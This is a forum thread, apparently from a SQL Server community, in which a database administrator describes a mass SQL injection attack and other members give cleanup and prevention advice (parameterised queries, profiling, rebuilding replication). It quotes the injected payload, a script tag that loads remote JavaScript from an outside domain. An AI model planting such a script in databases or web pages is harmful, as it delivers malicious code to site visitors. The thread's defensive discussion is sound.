July 2, 2008 at 5:03 am
Pleas help me!
I'm under injection attack and i don't no what can i do.
This script ' script src=http://www.hdadwcd.com/b.js /script' is injected to may database (sql server 2000).
It not only injected in many of databases field but also renamed my publication name to :
" publication name script src=http://www.hdadwcd.com/b.js /script "
How can i repair it and stop this injection
How can I edit binary fields in MSrepl_commands and delete this script from command field.
July 2, 2008 at 6:01 am
You need to find the application that is vulnerable to injection (you can use profiler to see the commands coming to the database)
There isn't a quick silver bullet on this. You need to find the vulnerable pages and fix them. Change SQL statements to parameterised rather than built up. Restrict the app's permissions to not allow it to directly acces the tables but to use stored procs.
I would suggest that you drop the publication in question and recreate it.
Gail Shaw
Microsoft Certified Master: SQL Server, MVP, M.Sc (Comp Sci)
SQL In The Wild: Discussions on DB performance with occasional diversions into recoverability
July 3, 2008 at 3:59 pm
When reading this. Scroll up to the top of this page in the upper frame you will see Search: type in the word "injection" (without the quotes) and then click the button labelled Go. And be prepared to read a vast amount of information concerning your problem and some recommended solutions from articles and forums here on SQL ServerCentral
July 24, 2008 at 3:29 am
Hi
Thank you for your last reply.
I resolved that problem by editing all tables and removing that script.
I think it was a new injection method.
This link was helpful:
http://www.msblog.org/index.php?s=yp
http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx
But I couldn’t resolve a part of problem:
There were many Binary fields in MSrepl_commands containing bad script.
I deleted them because I couldn’t edit them.
I will be pleased to teach “how to edit MSrepl_commands command field and alter its data?”
Yours truly
saeed.
July 24, 2008 at 3:31 am
The safest fix is probably to completely drop the replication and recreate it.
Gail Shaw
Microsoft Certified Master: SQL Server, MVP, M.Sc (Comp Sci)
SQL In The Wild: Discussions on DB performance with occasional diversions into recoverability
October 26, 2012 at 9:26 am
Wow, this is an old thread but still very pertinent.
We are rapidly migrating to SQL 2005.
But we were attacked by injection ... every vharchar field in every table replaced with similar .js crap. We restored and the world was good.
But we're trying to find the vulnerability ... of the publically visible pages on the site, (only 5 or 6) all are derived with stored procs and / or our own in house brewed trap.
We are told that SQL2005 and SQL2008 handle SQL injections far better.
We are also about to, within a month, implement a proper SQL Server 2005 mirror. But of course mirrors will merely mirror the injection; right?
I'm babbling ... but beyond stored procs and home grown filters, are there any other known hardware sotweare remedies.
You refer to a profiler to see commands ... where is that?
October 26, 2012 at 9:32 am
Can you post this in a new thread please?
Gail Shaw
Microsoft Certified Master: SQL Server, MVP, M.Sc (Comp Sci)
SQL In The Wild: Discussions on DB performance with occasional diversions into recoverability
October 26, 2012 at 9:38 am
Sorry .. by all means .. I'm new here ... my bad.
A new thread or somewhere you'd prefer?
Robert
October 26, 2012 at 9:43 am
New thread in the appropriate forum. Probably SQL 2005 T-SQL. Some people will look at a thread with lots of replies and not check it, assuming it's answered already.
Gail Shaw
Microsoft Certified Master: SQL Server, MVP, M.Sc (Comp Sci)
SQL In The Wild: Discussions on DB performance with occasional diversions into recoverability
October 26, 2012 at 9:48 am
Ok, will do BUT ... the main gist of this post was your mention of the "profiler"?
We are trying to determine the vulnerability?
Viewing 10 posts - 1 through 9 (of 9 total)
You must be logged in to reply to this topic. Login to reply